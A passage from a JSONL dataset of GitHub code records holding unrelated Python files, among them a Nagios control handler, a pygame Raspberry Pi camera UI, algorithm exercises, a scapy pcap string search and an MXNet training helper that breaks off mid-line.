column=3)\n\nnb_aleatoire_label = tk.Label(fenetre, text=\"Essais: 5\") \nnb_aleatoire_label.grid(row=13, column=3)\n\n\n# Affichage de la fenêtre\nfenetre.mainloop()","repo_name":"uvsq22200855/Projet_python","sub_path":"SUDOKU.py","file_name":"SUDOKU.py","file_ext":"py","file_size_in_byte":18193,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1250171243","text":"#!/usr/bin/env python\n#coding=utf-8\nimport base\nfrom toughlib.permit import permit\nfrom cyclone.web import authenticated\n\n\n\n@permit.route('/nagios/ctl')\nclass HostHandler(base.BaseHandler):\n\n\n @authenticated\n def get(self, template_variables={}):\n self.render('nagiosctl.html') \n\n @authenticated\n def post(self,**kwargs):\n def get_function(name):\n CMDS = {\n 'status' : self.nagapi.status_nagios,\n 'running': self.nagapi.is_running,\n 'reload' : self.nagapi.reload_nagios,\n 'start' : self.nagapi.start_nagios,\n 'stop' : self.nagapi.stop_nagios,\n 'restart': self.nagapi.restart_nagios,\n 'verify' : self.nagapi.verify_config\n }\n return CMDS[name]\n result = get_function(self.get_argument(\"exec\"))()\n self.render_json(code=result.code,msg=result.msg)\n\n","repo_name":"talkincode/ToughNMS","sub_path":"toughnms/console/handlers/nagiosctl.py","file_name":"nagiosctl.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"6392867605","text":"import heapq\ndef solution(operations):\n answer = []\n heap_min = [] #최소 힙\n heap_max = [] #최대 힙\n \n while(operations): #연산이 남아있을때까지 동작\n term_oper = operations.pop(0) #차례대로 연산을 oper_term 저장\n term = int(term_oper[2:]) #연산 중 숫자만 따로 D -11 일경우 term = -11\n if term_oper[:1] == 'I': #D -11일 경우 per_term[:1] = D 이 경우 else로 감.\n heapq.heappush(heap_min,term) #최소힙만들기\n heapq.heappush(heap_max,(-1 * term,term)) #최대힙 만들기, 안에 구조는 튜플구조 (예시) heap_max = [(-10,10),(12,-12)] \n else:\n if len(heap_min) == 0 : pass #heap이 빈경우\n elif term == -1: #최솟값 제거일때\n term_min = heapq.heappop(heap_min) #최소힙에서 pop실행 이때 변수 저장해서 아래 최대힙도 pop 해야함 이유)최소힙과 최대힙은 안의 구성원이 동일해야함\n heap_max.remove((-1 * term_min,term_min)) #최대힙은 튜플로 되어있으므로 그 형식에 맞춰서 제거\n \n else: #최댓값 제거일때\n term_max = heapq.heappop(heap_max)[1]\n heap_min.remove(term_max)\n \n if heap_min :\n answer.append(heapq.heappop(heap_max)[1])\n answer.append(heapq.heappop(heap_min))\n else :\n answer.append(0)\n answer.append(0)\n \n return answer\n\n#차례대로 연산을 진행하지않고 제거연산 추가연산 따로 진행하여 발생한 코드 오류\n\n'''\nimport heapq\ndef solution(operations):\n answer = []\n heap_min = []\n heap_max = []\n oper = []\n for i in operations:\n if i[0] == 'I':\n heapq.heappush(heap_min,int(i[1:]))\n heapq.heappush(heap_max,(-1 * int(i[1:]),int(i[1:])))\n else:\n oper.append(int(i[1:]))\n \n print(heap_min)\n print(heap_max)\n print(oper)\n \n \n for j in oper:\n if len(heap_min) == 0 : break\n elif j == -1:\n term_min = heapq.heappop(heap_min)\n heap_max.remove((-1 * term_min,term_min))\n print('min_min삭제',heap_min)\n print('min_max삭제',heap_max)\n\n else:\n term_max = heapq.heappop(heap_max)[1]\n heap_min.remove(term_max)\n print('max_min삭제',heap_min)\n print('max_max삭제',heap_max)\n \n print(heap_min)\n \n if heap_min :\n answer.append(heapq.heappop(heap_max)[1])\n answer.append(heapq.heappop(heap_min))\n else :\n answer.append(0)\n answer.append(0)\n \n return answer\n\n'''\n","repo_name":"Jun-ga/Coding_Practice","sub_path":"programmers/Heap/이중우선순위큐.py","file_name":"이중우선순위큐.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41748554334","text":"#!/usr/bin/python3\n\nimport psycopg2\n\ndbname = \"news\"\n\ndef connect(database_name):\n # Connect to the PostgreSQL database. Returns a databse connection.query\n try:\n db = psycopg2.connect(database=database_name)\n c = db.cursor()\n return db, c\n except psycopg2.Error as e:\n print ('Unable to connect to database')\n raise e\n\nclass get_query_results(object):\n # Parent class to get the query results\n def __init__(self, query):\n self.query = query\n db, c = connect(dbname)\n c.execute(self.query)\n self.rows = c.fetchall()\n db.close()\n\nclass poparticles(get_query_results):\n # Return the all time most popular articles\n def __init__(self, query):\n # Initialize attributes of the parent class\n super().__init__(query)\n # Print the results of the child class\n for (title, count) in self.rows:\n print(\" {} - {} views\".format(title, count))\n\nclass popauthors(get_query_results):\n # Return the all time most popular authors\n def __init__(self, query):\n # Initialize attributes of the parent class\n super().__init__(query)\n # Print the results of the child class\n for (name, count) in self.rows:\n print(\" {} - {} views\".format(name, count))\n\nclass requesterror(get_query_results):\n # Return on which days did more than 1% of requests lead to errors\n def __init__(self, query):\n # Initialize attributes of the parent class\n super().__init__(query)\n # Print the results of the child class\n for (formattedate, errorrate) in self.rows:\n print(\"{} - {:.2}% errors\".format(formattedate, errorrate))\n# for row in self.rows:\n# print (str(row[0]), ' - ', str(round(row[1], 1)), '% errors')\n","repo_name":"sssamwong/Udacity-FSWD","sub_path":"Project_Logs_Analysis/vagrant/LogAnalysis/analysismethod.py","file_name":"analysismethod.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23048968316","text":"# Bu araç @keyiflerolsun tarafından | @KekikAkademi için yazılmıştır.\n\nfrom Robot.Edevat.zenginLog import log_yolla, hata_log\nfrom Robot import DESTEK_KOMUT\nfrom pathlib import Path\n\nDESTEK_KOMUT.update({\n Path(__file__).stem : {\n \"aciklama\" : \"Merhaba dünya..\",\n \"kullanim\" : [\n None\n ],\n \"ornekler\" : [\n \".komut\"\n ]\n }\n})\n\nfrom pyrogram import Client, filters\n\n@Client.on_message(filters.command(['komut'], ['!','.','/']))\nasync def komut(client, message):\n # < Başlangıç\n await log_yolla(client, message)\n ilk_mesaj = await message.reply(\"__Bekleyin..__\",\n disable_web_page_preview = True,\n parse_mode = \"Markdown\"\n )\n #------------------------------------------------------------- Başlangıç >\n\n\n await ilk_mesaj.reply(\"Merhaba dünyalı\")\n\n try:\n hata_denemesi()\n except Exception as hata:\n await hata_log(client, hata)\n await ilk_mesaj.edit(f'**Hata Var !**\\n\\n`{type(hata).__name__}`\\n\\n__{hata}__')","repo_name":"omerfarukbicer042/bot","sub_path":"Robot/Eklentiler/!komut.py","file_name":"!komut.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34628611316","text":"import os\nimport pygame\nfrom pygame.locals import *\nimport cv2\nimport numpy as np\nimport datetime\nimport math\nimport sys\n\n'''\nUI Layout:\nTall thin left panel: Leftmost 10-20% of screen\n Contains buttons: stop_preview, start_preview, save_image\nRemaining screen used for video display\n\nDone:\n* Implement video start/stop buttons\n* Implement video transform to fill viewing area\n* Implement button text change when pressed\n\nTodo:\n* Brightness control (does appeaer to be available on kuman 3.5 lcd)\n* Add icon to flip image orientation vertical or horizontal\n* Improve debug options\n\n* Clickable icons and/or shapes\n* Update component to scale out if resolution is greater than a certain size.\n* Implement brightness slider\n* Performance\n Use timeit to verify some different methods of retrieving and displaying video.\n https://pythonhow.com/measure-execution-time-python-code/\n https://docs.python.org/2/library/timeit.html\n https://stackoverflow.com/questions/7370801/measure-time-elapsed-in-python\n VideoCapture options\n https://docs.opencv.org/2.4/modules/highgui/doc/reading_and_writing_images_and_video.html#videocapture-set\n ex. CV_CAP_PROP_CONVERT_RGB - whether or not to convert to RGB\n Test using camera directly.\n Make new class for each method. Test and report methodically.\n Use matplotlib to generate a diagram reporting results.\n* display a splash screen until loading is done\n\nCode references:\nhttps://github.com/Mekire/pygame-button\nhttps://github.com/facelessloser/night_vision_pi/blob/master/camera_app/camera.py\nhttps://learn.adafruit.com/pages/697/elements/83233/download (pyscope.py)\nhttps://github.com/adafruit/adafruit-pi-cam\n'''\n\n# Find the correct framebuffer device (/dev/fb0 or /dev/fb1) and set\n# it here or set it as an env variable.\n# Before running, on command line, set env var DISPLAY. Run `export DISPLAY=0:0` or `export DISPLAY=:0`\n# or set it here.\nos.environ[\"SDL_FBDEV\"] = \"/dev/fb0\"\n\n# Initialize variables\nscreen = None\nbackground = None\nclock = None\ncomponents = []\nevent_consumers = []\nbtnStartStop = None\nvideo_viewer = None\nflip_mouse_event_xy = True\n\n# Colors\nRED = (200,0,0)\nGREEN = (0,200,0)\nBLUE = (0,0,255)\nBLACK = (0,0,0)\nBRIGHT_RED = (255,0,0)\nBRIGHT_GREEN = (0,255,0)\nBRIGHTISH_GREEN = (30,230,30)\n\n\ndef main():\n global screen, clock\n # Configure and verify any rqeuired drivers\n verify_drivers()\n\n # Initialize pygame\n pygame.init()\n # Initialize clock\n clock = pygame.time.Clock()\n # Disable mouse visibility\n pygame.mouse.set_visible(False)\n # Ininitializes a new pygame screen using the framebuffer\n screen = build_screen()\n\n pygame.display.set_caption('Pi Cam')\n draw_background() # Draw and blit background and text\n pygame.display.update() # Draw Initial Screen\n add_components()\n event_loop() # Run event loop\n video_viewer.release()\n sys.exit(0)\n\n\n'''\nBuild initial pygame screen object.\nGet available modes from pygame.display.list_modes() and use the smallest mode > 480x320\n'''\ndef build_screen():\n # Defaults\n my_res = (640,480)\n # Initialize screen\n modes = pygame.display.list_modes()\n if modes:\n print(\"modes found\")\n print(modes)\n my_res = next(iter([item for item in reversed(modes) if item[0] > 480]))\n\n s_flags = pygame.FULLSCREEN\n if my_res[0] > 1000:\n s_flags = pygame.RESIZABLE\n\n print(\"Initializing screen at {}x{}\".format(my_res[0],my_res[1]))\n screen = pygame.display.set_mode(my_res, s_flags)\n\n return screen\n\n\n'''\nObsoleted due to inaccuracy of display.Info() when not using x windows\n'''\ndef build_screen_with_display_info():\n # Get native display info from display.Info() by calling it before running first display.set_mode()\n # NOTE: sometimes display.Info() is not accurate, in particular without x windows, while using framebuffer\n s_res = (800,600)\n s_flags = 0\n\n native_info = pygame.display.Info()\n res_native = (native_info.current_w, native_info.current_h)\n if native_info.current_w < 800:\n s_res = res_native\n s_flags = pygame.FULLSCREEN\n print(\"Screen setup - flags: FULLSCREEN, resolution: {}\".format(s_res))\n else:\n # Since resizable, adjust viewing area to be smaller than full screen\n res_tmp = s_res\n s_res = (int(res_tmp[0]*0.8), int(res_tmp[1]*0.8))\n s_flags = pygame.RESIZABLE\n print(\"Screen setup - flags: RESIZABLE, resolution: {}\".format(s_res))\n screen = pygame.display.set_mode(s_res, s_flags)\n return screen\n\n\ndef add_components():\n global video_viewer, components, event_consumers, btnStartStop\n s_width = screen.get_size()[0]\n s_height = screen.get_size()[1]\n\n # Add PiCamera viewer\n viewer_rect = pygame.Rect((0,0),screen.get_size())\n video_viewer = Cv2LocalCameraViewer(viewer_rect)\n components.append(video_viewer)\n\n # Add Start Button\n btn_rect1 = pygame.Rect(4,4,int(s_width*0.1),int(s_height*0.1))\n initial_text = \"Stop\" if video_viewer.get_running() == True else \"Start\"\n btnStartStop = Button(btn_rect1,text=initial_text, callback=btnStartStop_callback)\n components.append(btnStartStop)\n event_consumers.append(btnStartStop)\n\n\ndef btnStartStop_callback():\n global video_viewer, btnStartStop\n if video_viewer is None or btnStartStop is None:\n return\n video_viewer.set_running(not video_viewer.get_running())\n running = video_viewer.get_running()\n if running:\n btnStartStop.set_text(\"Stop\")\n else:\n btnStartStop.set_text(\"Start\")\n\n\ndef shutdown():\n # release camera. If this isn't done, pi may need to be rebooted before it can be used again\n video_viewer.release()\n sys.exit(0)\n\n\ndef translate_click_pos(orig_pos):\n global screen, flip_mouse_event_xy\n if not flip_mouse_event_xy:\n pos = orig_pos\n else:\n print(\"swapping click pos x and y\")\n pos = (screen.get_size()[0] - orig_pos[0], screen.get_size()[1] - orig_pos[1])\n return pos\n\n\ndef event_loop():\n # Event loop\n click_pos = None\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n elif event.type == KEYDOWN:\n if event.key == K_q:\n running = False\n if event.type == MOUSEBUTTONDOWN or event.type == MOUSEMOTION:\n click_pos = translate_click_pos(event.pos)\n for ec in event_consumers:\n ec.check_event(event)\n\n draw_background()\n for c in components:\n c.draw()\n #if click_pos:\n # pygame.draw.rect(screen, BLUE, (click_pos[0]-5,click_pos[1]-5, 20, 20))\n pygame.draw.rect(screen, RED, screen.get_rect().inflate(-2,-2), 4)\n pygame.display.update()\n clock.tick(30)\n\n\nclass Cv2LocalCameraViewer:\n '''\n PicameraViewer class\n Expand video frame width to fill self.rect maximally and scale height by same scale factor.\n OpenCV VideoCapture properties:\n https://docs.opencv.org/2.4/modules/highgui/doc/reading_and_writing_images_and_video.html#videocapture-set\n '''\n def __init__(self, rect, **kwargs):\n self.noframe_count = 0\n self.rect = rect\n self.capture_enabled = True\n self.fps = 24\n if kwargs:\n for key, value in kwargs.items():\n if key == 'capture_enabled' : self.capture_enabled = value\n\n # Initialize stream capture\n self.cap = cv2.VideoCapture(0)\n self.cap.set(cv2.CAP_PROP_FPS, self.fps)\n #self.cap.set(cv2.CAP_PROP_CONVERT_RGB, 1)\n if not self.cap.isOpened():\n print(\"Failure opening camera 0.\")\n self.capture_enabled = False\n # Initialize font for stopped capture\n self.font = pygame.font.Font(None, int(self.rect.width / 12))\n # Create background surface\n self.bg = pygame.Surface((self.rect.width, self.rect.height)).convert()\n self.text_stopped = self.font.render(\"Stopped\", 1, (220,220,220))\n # Initialize variable that will hold the scaled video height\n self.scaled_height = 0\n\n def set_running(self, enabled=True):\n self.capture_enabled = enabled\n\n def get_running(self):\n return self.capture_enabled\n\n def release(self):\n self.cap.release()\n\n def draw(self):\n # Get and display MJPEG frames (images) if video is enabled\n # image returned by CV2 is a numpy array\n if not self.capture_enabled:\n self.bg.fill((0,0,0))\n textpos = self.text_stopped.get_rect()\n textpos.center = self.bg.get_rect().center\n self.bg.blit(self.text_stopped, textpos)\n screen.blit(self.bg, self.rect)\n else:\n ret, img = self.cap.read()\n if not ret or img is None:\n self.noframe_count = self.noframe_count + 1\n else:\n self.noframe_count = 0\n # print(\"{} - frame read - {}\".format(datetime.datetime.now(), ret))\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB) # no longer needed after setting CV_CAP_PROP_CONVERT_RGB\n #img = np.rot90(img, 3)\n img = np.swapaxes(img,0,1) # replaces np.rot90(frame)\n img = np.flipud(img) # flip image array on the y-axis only\n img = np.fliplr(img) # flip image array on the y-axis only, using fliplr because we already swapped axes\n # Calculate scaled width and height of video\n if self.scaled_height == 0:\n frame_w, frame_h = img.shape[:2] # getting dimensions of image, which is actually an ndarray\n scale_factor = self.rect.width/frame_w\n self.scaled_height = math.floor(frame_h * scale_factor / 2.0) * 2 # rounds down to nearest even int\n frame = pygame.surfarray.make_surface(img)\n frame = pygame.transform.scale(frame,(self.rect.width,self.scaled_height))\n screen.blit(frame, self.rect, self.rect)\n\n\nclass Button:\n ''' Button class: rect, label text, color, bgcolor, callback\n '''\n def __init__(self, rect, **kwargs):\n self.rect = rect # Boundary rect\n self.color = (10,10,10) # text color\n self.bgcolor = BRIGHTISH_GREEN # bg color\n self.text = '>' # text\n self.callback = None # Callback function\n if kwargs:\n for key, value in kwargs.items():\n if key == 'color' : self.color = value\n elif key == 'bgcolor' : self.bgcolor = value\n elif key == 'text' : self.text = value\n elif key == 'callback' : self.callback = value\n # Create font\n self.font = pygame.font.Font(None, int(screen.get_size()[1]/20))\n # Create background surface\n self.bg = pygame.Surface((self.rect.width, self.rect.height)).convert()\n self.clicked = False\n\n def set_text(self, text):\n if text is None:\n self.text = ''\n else:\n self.text = text\n\n def check_event(self, event):\n ''' Receive and process events from event loop.\n Events handled:\n MOUSEBUTTONUP pos, button\n MOUSEBUTTONDOWN pos, button\n FINGERDOWN touch_id, finger_id, x, y, dx, dy\n FINGERUP touch_id, finger_id, x, y, dx, dy\n NOTE: FINGERDOWN and FINGERUP events not supported until pygame 1.9.5\n '''\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n self.handle_mousedown(event)\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n self.handle_mouseup(event)\n # elif event.type == FINGERDOWN:\n # self.handle_fingerdown(event)\n # elif event.type == FINGERUP:\n # self.handle_fingerup(event)\n\n def handle_mousedown(self, event):\n '''Handle mousedown event'''\n #print('Mouse down')\n if self.rect.collidepoint(translate_click_pos(event.pos)):\n self.clicked = True\n print('{} - Button click detected at {}'.format(self.text, translate_click_pos(event.pos)))\n\n def handle_mouseup(self, event):\n '''Handle mouse up event. By default, callback function is called on mouse/finger up.'''\n if self.clicked:\n if not self.callback == None:\n self.callback()\n self.clicked = False\n\n # def handle_fingerdown(self, event):\n # '''Handle fingerdown event'''\n # #print('Finger down')\n # event_pos = (event.x, event.y)\n # if self.rect.collidepoint(event_pos):\n # self.clicked = True\n # print('{} - Finger down (click) detected'.format(self.text))\n\n # def handle_fingerup(self, event):\n # '''Handle finger up event. By default, callback function is called on mouse/finger up.'''\n # if self.clicked:\n # if not self.callback == None:\n # self.callback()\n # self.clicked = False\n\n def draw(self):\n # Add border if selected\n self.bg.fill(self.bgcolor)\n # Create invisible cursor to use mouse pointer but not see it.\n pygame.mouse.set_cursor((8,8),(0,0),(0,0,0,0,0,0,0,0),(0,0,0,0,0,0,0,0))\n # Add text\n text = self.font.render(self.text, 1, self.color)\n textpos = text.get_rect()\n textpos.center = self.bg.get_rect().center\n self.bg.blit(text, textpos)\n screen.blit(self.bg, self.rect)\n # if self.drawborder:\n # print('Trying to draw border')\n # pygame.draw.rect(screen, RED, self.rect.inflate(-2,-2), 4)\n\n\ndef draw_background():\n global background\n # Fill background\n if not background:\n background = pygame.Surface(screen.get_size()).convert()\n background.fill(BLACK)\n screen.blit(background, (0, 0))\n\n\ndef verify_drivers():\n # Based on \"Python GUI in Linux frame buffer\"\n # http://www.karoltomala.com/blog/?p=679\n disp_no = os.getenv(\"DISPLAY\")\n if disp_no:\n print (\"I'm running under X display = {0}\".format(disp_no))\n\n # Check which frame buffer drivers are available\n # Start with fbcon since directfb hangs with composite output\n drivers = ['fbcon', 'directfb', 'svgalib']\n found = False\n for driver in drivers:\n # Make sure that SDL_VIDEODRIVER is set\n if not os.getenv('SDL_VIDEODRIVER'):\n os.putenv('SDL_VIDEODRIVER', driver)\n try:\n pygame.display.init()\n except pygame.error:\n print('Driver: {0} failed.'.format(driver))\n continue\n found = True\n if not found:\n raise Exception('No suitable video driver found!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jwalkerdev/pi-nv","sub_path":"src/camera-ui/pg-picam-ui.py","file_name":"pg-picam-ui.py","file_ext":"py","file_size_in_byte":14967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36479414616","text":"import os\nimport couchdb\nimport glob\nimport logging\nfrom datetime import datetime\nfrom datetime import date\nimport argparse\nimport yaml\ntry:\n import ConfigParser\nexcept ImportError:\n import configparser\n\nCONFIG = {}\n\nlogger = logging.getLogger(__name__)\n\n\n\ndef main(args):\n configuration_file = args.config\n load_yaml_config(configuration_file)\n couch=setupServer(CONFIG)\n flowcell_db = couch[\"x_flowcells\"]\n instruments = {}\n instruments[\"ST-E00198\"] = []\n instruments[\"ST-E00201\"] = []\n instruments[\"ST-E00214\"] = []\n instruments[\"ST-E00266\"] = []\n instruments[\"ST-E00269\"] = []\n\n for fc_doc in flowcell_db:\n try:\n instrument = flowcell_db[fc_doc][\"Runinfo\"][\"Instrument\"]\n fcid = flowcell_db[fc_doc][\"Runinfo\"][\"Id\"]\n except KeyError:\n if \"RunInfo\" in flowcell_db[fc_doc]:\n instrument = flowcell_db[fc_doc][\"RunInfo\"][\"Instrument\"]\n fcid = flowcell_db[fc_doc][\"RunInfo\"][\"Id\"]\n else:\n continue\n #check if the instrument is one of the ones I want to check\n if instrument in [\"ST-E00198\", \"ST-E00201\", \"ST-E00214\", \"ST-E00266\", \"ST-E00269\"]:\n try:\n time_cycles = flowcell_db[fc_doc][\"time cycles\"]\n except KeyError:\n continue\n first_cycle_start = time_cycles[0]['start']\n last_cycle_end = time_cycles[-1]['end']\n # the split is done to remove the decimal point in the seconds\n first_cycle_date = datetime.strptime(first_cycle_start.split(\".\")[0], '%Y-%m-%d %H:%M:%S')\n last_cycle_date = datetime.strptime(last_cycle_end.split(\".\")[0], '%Y-%m-%d %H:%M:%S')\n delta = last_cycle_date - first_cycle_date\n instruments[instrument].append({\"{}\".format(fcid): delta.total_seconds()/3600 } )\n\n for instrument in instruments:\n print(\"time\\t{}\".format(instrument))\n for run in sorted(instruments[instrument]):\n date_illumina_format =list(run.keys())[0].split(\"_\")[0]\n date_exel_format=\"{}/{}/20{}\".format(date_illumina_format[4:6] , date_illumina_format[2:4], date_illumina_format[0:2])\n print(\"{}\\t{}\".format(date_exel_format, run[list(run.keys())[0]]))\n\n\n\n\ndef setupServer(conf):\n db_conf = conf['statusdb']\n url=\"https://{0}:{1}@{2}\".format(db_conf['username'], db_conf['password'], db_conf['url'])\n return couchdb.Server(url)\n\n\n\ndef load_yaml_config(config_file):\n \"\"\"Load YAML config file\n\n :param str config_file: The path to the configuration file.\n\n :returns: A dict of the parsed config file.\n :rtype: dict\n :raises IOError: If the config file cannot be opened.\n \"\"\"\n if type(config_file) is file:\n CONFIG.update(yaml.load(config_file) or {})\n return CONFIG\n else:\n try:\n with open(config_file, 'r') as f:\n content = yaml.load(f)\n CONFIG.update(content)\n return content\n except IOError as e:\n e.message = \"Could not open configuration file \\\"{}\\\".\".format(config_file)\n raise e\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"\"\"Check running times\"\"\")\n parser.add_argument('--config', help=\"configuration file\", type=str, required=True)\n args = parser.parse_args()\n\n main(args)\n","repo_name":"SciLifeLab/standalone_scripts","sub_path":"hiseqX_run_times.py","file_name":"hiseqX_run_times.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32046434492","text":"#!/usr/bin/python3\n\n# Given array of characters where each character represents\n# a fruit tree, are given two baskets. Goal is to put\n# max number of fruits in each basket, but each basket\n# can only have 1 type of fruit.\n\n# Can start with any tree, but can't skip a tree once\n# started. Will pick one fruit from each tree until cannot\n\n# Time complexity: O(N)\n# Space complexity: O(1)\ndef pick_fruit(arr):\n\n # dictionary to keep track of frequencies\n baskets = {}\n\n # maximum length of substring, which represents\n # total number of fruit collected\n max_len = 0\n\n # start of window\n i = 0\n\n # j tracks end of window\n for j in range(len(arr)):\n \n if arr[j] not in baskets:\n baskets[arr[j]] = 1\n\n else:\n baskets[arr[j]] += 1\n\n # if number of unique char in dictionary\n # is greater than 2, then need to increment i\n # and remove corresponding chars from dictionary\n while len(baskets) > 2:\n\n if baskets[arr[i]] == 1:\n del baskets[arr[i]]\n else:\n baskets[arr[i]] -= 1\n\n i += 1\n\n max_len = max(max_len, j - i + 1)\n\n return max_len\n \n \n\nif __name__ == \"__main__\":\n\n fruit = [\"A\", \"B\", \"C\", \"A\", \"C\"]\n\n # Expected output: 3\n # 2 C and 1 A from [\"C\", \"A\", \"C\"]\n print(pick_fruit(fruit))\n \n\n fruit = [\"A\", \"B\", \"C\", \"B\", \"B\", \"C\"]\n\n # Expected output: 5\n # 3 B and 2 C from [\"B\", \"C\", \"B\", \"B\", \"C\"]\n print(pick_fruit(fruit))\n","repo_name":"mhichen/Patterns","sub_path":"Sliding_Window/fruits_into_basket.py","file_name":"fruits_into_basket.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28935011030","text":"dey = input()\nif dey == \"Monday\"\\\n or dey == \"Tuesday\"\\\n or dey == \"Wednesday\" \\\n or dey == \"Thursday\" \\\n or dey == \"Friday\":\n print(\"Working day\")\nelif dey == \"Saturday\" or dey == \"Sunday\":\n print(\"Weekend\")\nelse:\n print(\"Error\")","repo_name":"Benkolov/Python-Basic-Soft-Uni-07.22","sub_path":"01.Lab/03.Conditional_statements_advanced_lab/weekend_or_working_day.py","file_name":"weekend_or_working_day.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31995687647","text":"import math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef create_sin_wave(cycles, resolution):\n length = np.pi * 2 * cycles\n return np.sin(np.arange(0, length, length/resolution))\n\nstart_time = 0\nend_time = 1\nsample_rate = 1000\ntime = np.arange(start_time, end_time, 1/sample_rate)\ntheta = 0\nfrequency = 100\namplitude = 1\nsinewave = amplitude * np.sin(2 * np.pi * frequency * time + theta)\nfigure(figsize=(20, 6), dpi=80)\nplt.plot(sinewave)","repo_name":"JackHaek/FFT","sub_path":"FFT.py","file_name":"FFT.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16672366361","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom os import listdir\nfrom os.path import join\nfrom re import match\n\nif __name__ == \"__main__\":\n DATA_DIR = \"imgs\"\n HTML_TEMPLATE = \"template.html\"\n BOOK_NAME = \"iLikeYou\"\n BODY_TAG = \"\"\n BODY = \"\"\n\n for imgFilename in [f for f in sorted(listdir(DATA_DIR)) if f.endswith(\".png\")]:\n fullPath = join(DATA_DIR, imgFilename)\n\n matchDates = match(r\"^[0-9]{2}_([0-9]{4})([0-9]{2})\\-?([0-9]{4})?([0-9]{2})?.png\", imgFilename)\n fromYear, fromMonth, toYear, toMonth = matchDates.groups()\n\n mDate = fromMonth + \"/\" + fromYear\n mDate += \" - \" + toMonth + \"/\" + toYear if toYear is not None else \"\"\n\n BODY += \"
\\n\"\n BODY += \" \\n\"%fullPath\n BODY += \"
%s
\\n\"%mDate\n BODY += \"
\\n\"\n\n\n # write output file\n with open(BOOK_NAME+\".html\", 'w') as out:\n with open(HTML_TEMPLATE) as temp:\n for line in temp.readlines():\n if BODY_TAG in line:\n line = BODY\n out.write(line)\n","repo_name":"thiagohersan/iLikeYou-book","sub_path":"prepBook.py","file_name":"prepBook.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30310895009","text":"#!/usr/bin/python\nfrom scapy.all import *\n\n# Change the path of the output file according to your system\nWindows_OS = \"C:/../../../../Windows_OS.txt\"\n# Change the location of pcap file where you have stored it on your PC\npcap_file = \"C:/../../../../http_google.pcap\"\n\nf1 = open(Windows_OS, 'a+')\n\ntry:\n print('[+] Reading and parsing pcap file: %s' % pcap_file)\n a = rdpcap(pcap_file)\n #print(a)\nexcept Exception as e:\n print('Something went wrong while opening/reading the pcap file.' '\\n\\nThe error message is: %s' % e)\n exit(0)\n\n#print(len(a))\nx = 0\nwhile x < len(a):\n\n # Re-create the entire packet from the pcap file and then write it to our file\n #print(a[x].command())\n f1.write(a[x].command())\n raw_packet = str(a[x].command())\n if raw_packet.count(\"Windows\") > 0:\n print(\"--------------\")\n print(\"| PACKET \" + str(x + 1) + \" |\")\n print(\"--------------\")\n print(\"Windows Operating system\")\n f1.write(\"-------------\")\n f1.write(\"\\n\")\n f1.write(\"| PACKET \" + str(x + 1) + \" |\")\n f1.write(\"\\n\")\n f1.write(\"-------------\")\n f1.write(\"\\n\")\n f1.write(\"Windows Operating System\")\n f1.write(\"\\n\")\n f1.write(\"\\n\")\n x += 1\nf1.close()\n","repo_name":"sarveshkapre/PCAP_Analyzer","sub_path":"Passive Fingerprinting/Identify_Windows_OS.py","file_name":"Identify_Windows_OS.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14067141707","text":"import find_mxnet\nimport mxnet as mx\nimport logging\nimport os\nimport getpass\n\ndef fit(args, network, data_loader, batch_end_callback=None):\n # kvstore\n kv = mx.kvstore.create(args.kv_store)\n\n # logging\n head = '%(asctime)-15s Node[' + str(kv.rank) + '] %(message)s'\n if 'log_file' in args and args.log_file is not None:\n log_file = args.log_file\n log_dir = args.log_dir\n log_file_full_name = os.path.join(log_dir, log_file)\n if not os.path.exists(log_dir):\n os.mkdir(log_dir)\n logger = logging.getLogger()\n handler = logging.FileHandler(log_file_full_name)\n formatter = logging.Formatter(head)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n logger.info('start with arguments %s', args)\n else:\n logging.basicConfig(level=logging.DEBUG, format=head)\n logging.info('start with arguments %s', args)\n\n # load model\n kv_store_type = \"\"\n if args.kv_store == \"dist_sync\":\n kv_store_type = \"bsp\"\n elif args.kv_store == \"dist_async\":\n kv_store_type = \"asp\"\n elif args.kv_store == \"dist_gsync\":\n kv_store_type = \"gsp\"\n elif args.kv_store == \"dist_ssync\":\n kv_store_type = \"ssp\"\n user = getpass.getuser()\n network_symbol = None\n if args.network == \"inception-bn-28-small\":\n network_symbol = \"inception_bn_small\"\n elif args.network == \"inception-bn\":\n network_symbol = \"inception\"\n elif args.network == \"3conv\":\n network_symbol = \"3conv\"\n\n if not os.path.exists(\"/home/{}/mxnet_model/model/{}/{}/{}\".format(user, args.dataset, network_symbol, kv_store_type)):\n 